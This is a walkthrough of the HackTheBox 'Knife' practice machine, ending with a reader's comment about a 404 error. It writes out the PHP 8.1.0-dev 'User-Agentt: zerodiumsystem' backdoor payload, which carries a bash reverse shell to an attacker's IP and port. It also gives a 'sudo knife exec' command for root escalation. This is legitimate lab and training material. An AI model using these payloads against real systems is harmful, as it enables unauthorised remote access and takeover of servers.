HackTheBox : Knife Walkthrough
Concepts Learnt :
- Enumeration
2. Burp Suite
3. PHP Vulnerability
4. Ruby (Knife)
Steps to Enumerate :
Run an Nmap Scan to find all the open ports!
Command : nmap 10.10.10.242 -A
10.10.10.242 IP of the Server
-A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information.
-vv Defines level 2 verbosity for the scan
data:image/s3,"s3://crabby-images/dee3e/dee3ee802a04135694f2ea9711af6a1db50b8598" alt=""
We see that there are 2 ports open :
22/tcp- SSH port
80/tcp- HTTP port
Lets check the http site on port 80:
data:image/s3,"s3://crabby-images/2dede/2dede6686e0c2ce6d1afff7e9a973c56cd9dd689" alt=""
It is a simple site with no clickable elements!
We can see that PHP version is 8.1.0 which is vulnerable to user agentt RCE
data:image/s3,"s3://crabby-images/ffe0d/ffe0dc2a4321d028d030fc80ffe1b4194aaacd37" alt=""
Let run the site through burp suite and exploit
Capture using the proxy!
data:image/s3,"s3://crabby-images/4ff62/4ff62ef38ee71f03ecfc95b4269ac92c7d503344" alt=""
Now pass it through the repeater and use the RCE code to execute!
Command: User-Agentt: zerodiumsystem(“/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’”);
Add your IP and port in the command above before executing!
data:image/s3,"s3://crabby-images/35dd9/35dd9092628bb0fc7a285cb79053ae26a496b77d" alt=""
Now run the netcat listener to check for connections!
data:image/s3,"s3://crabby-images/d81ce/d81cee82c4137c9f39a6812078252aed09daed79" alt=""
We get a shell for the user James
data:image/s3,"s3://crabby-images/39dc7/39dc7af0f32b6c150b49d610da4e32911c9965a1" alt=""
Let navigate to the James folder!
data:image/s3,"s3://crabby-images/2db56/2db567271a082bb75253cef69a59e7423327c841" alt=""
Let’s check for the user.txt file
And we have our first flag!
Checking for sudo commands we can see that we can run /usr/bin/knife using sudo perms without a password.
data:image/s3,"s3://crabby-images/c7989/c79897147bf85f2c94fa573e85ac11189d14555f" alt=""
Checking knife online, it is an automation tool by chef. You can check the documentation here.
data:image/s3,"s3://crabby-images/ef073/ef0730f974cb0172d79909c1d97e4af92e1f616d" alt=""
Running sudo knife in the terminal we get a list of all the commands that can be executed.
data:image/s3,"s3://crabby-images/9bed5/9bed586c463983fd7a90f2f207e2db29accfadb1" alt=""
The one exec, in particular, can execute code using the Ruby library!
data:image/s3,"s3://crabby-images/9104c/9104cc79b238ec5b9064a2c955a8870b492cbfb4" alt=""
Let’s use that to run the shell command!
data:image/s3,"s3://crabby-images/d327a/d327a7ef1dd3944a878b966ef8ea7d2847ffaa8f" alt=""
You can check all the possible ways to run a shell script from ruby code here.
Command: sudo knife exec -E “system(‘/bin/sh -i’)”
And we get a shell!
Let’s get the default Linux shell layout
Command : python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
data:image/s3,"s3://crabby-images/6337f/6337f078c027fbc1f74651c7de936f26f6f6514b" alt=""
And we can see we are root!
Let navigate to the root folder and check for root.txt!
data:image/s3,"s3://crabby-images/205e7/205e7bd1770a515fd246cf412e4a88902091351c" alt=""
And we have our second flag!
This was a fun room to work on. Hope you enjoyed!
When I run the burp command part, I get an out put of :
ReplyDeleteHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25
No input file specified.
The date was there, I just removed it when I pasted but, I have no idea what this means. Pls help!